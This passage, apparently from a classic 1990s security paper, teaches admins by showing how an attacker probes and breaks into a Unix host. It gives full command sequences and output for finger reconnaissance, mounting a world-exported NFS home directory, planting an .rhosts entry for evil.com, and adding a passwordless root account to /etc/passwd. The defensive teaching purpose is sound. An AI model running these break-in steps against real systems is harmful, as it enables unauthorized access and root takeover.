(target) host. There is a wealth of network services to look at:

finger, showmount, and rpcinfo are good starting points. But don't stop

there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,

and as many other services as you can find. There are so many methods

and techniques that space precludes us from showing all of them, but we

will try to show a cross-section of the most common and/or dangerous

strategies that we have seen or have thought of. Ideally, you would

gather such information about all hosts on the subnet or area of attack

-- information is power -- but for now we'll examine only our intended

target.



To start out, you look at what the ubiquitous finger command shows you

(assume it is 6pm, Nov 6, 1993):



victim % finger @victim.com

[victim.com]

Login Name TTY Idle When Where

zen Dr. Fubar co 1d Wed 08:00 death.com



Good! A single idle user -- it is likely that no one will notice if you

actually manage to break in.



Now you try more tactics. As every finger devotee knows, fingering "@",

"0", and "", as well as common names, such as root, bin, ftp, system,

guest, demo, manager, etc., can reveal interesting information. What

that information is depends on the version of finger that your target is

running, but the most notable are account names, along with their home

directories and the host that they last logged in from.



To add to this information, you can use rusers (in particular with the

-l flag) to get useful information on logged-in users.



Trying these commands on victim.com reveals the following information,

presented in a compressed tabular form to save space:



Login Home-dir Shell Last login, from where

----- -------- ----- ----------------------

root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com

bin /bin Never logged in

nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co

daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com

sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com

zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com

sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com

guest /export/foo /bin/sh Never logged in

ftp /home/ftp Never logged in



Both our experiments with SATAN and watching system crackers at work

have proved to us that finger is one of the most dangerous services,

because it is so useful for investigating a potential target. However,

much of this information is useful only when used in conjunction with

other data.



For instance, running showmount on your target reveals:



evil % showmount -e victim.com

export list for victim.com:

/export (everyone)

/var (everyone)

/usr easy

/export/exec/kvm/sun4c.sunos.4.1.3 easy

/export/root/easy easy

/export/swap/easy easy



Note that /export/foo is exported to the world; also note that this is

user guest's home directory. Time for your first break-in! In this

case, you'll mount the home directory of user "guest." Since you don't

have a corresponding account on the local machine and since root cannot

modify files on an NFS mounted filesystem, you create a "guest" account

in your local password file. As user guest you can put an .rhosts entry

in the remote guest home directory, which will allow you to login to the

target machine without having to supply a password.



evil # mount victim.com:/export/foo /foo

evil # cd /foo

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest

evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest

evil # su guest

evil % echo evil.com >> guest/.rhosts

evil % rlogin victim.com

Welcome to victim.com!

victim %



If, instead of home directories, victim.com were exporting filesystems

with user commands (say, /usr or /usr/local/bin), you could replace a

command with a trojan horse that executes any command of your choice.

The next user to execute that command would execute your program.



We suggest that filesystems be exported:



o Read/write only to specific, trusted clients.

o Read-only, where possible (data or programs can often be

exported in this manner.)



If the target has a "+" wildcard in its /etc/hosts.equiv (the default in

various vendor's machines) or has the netgroups bug (CERT advisory

91:12), any non-root user with a login name in the target's password

file can rlogin to the target without a password. And since the user

"bin" often owns key files and directories, your next attack is to try

to log in to the target host and modify the password file to let you

have root access:



evil % whoami

bin

evil % rsh victim.com csh -i

Warning: no access to tty; thus no job control in this shell...

victim % ls -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd

victim % ^D

evil % rlogin victim.com -l toor

Welcome to victim.com!

victim #



A few notes about the method used above; "rsh victim.com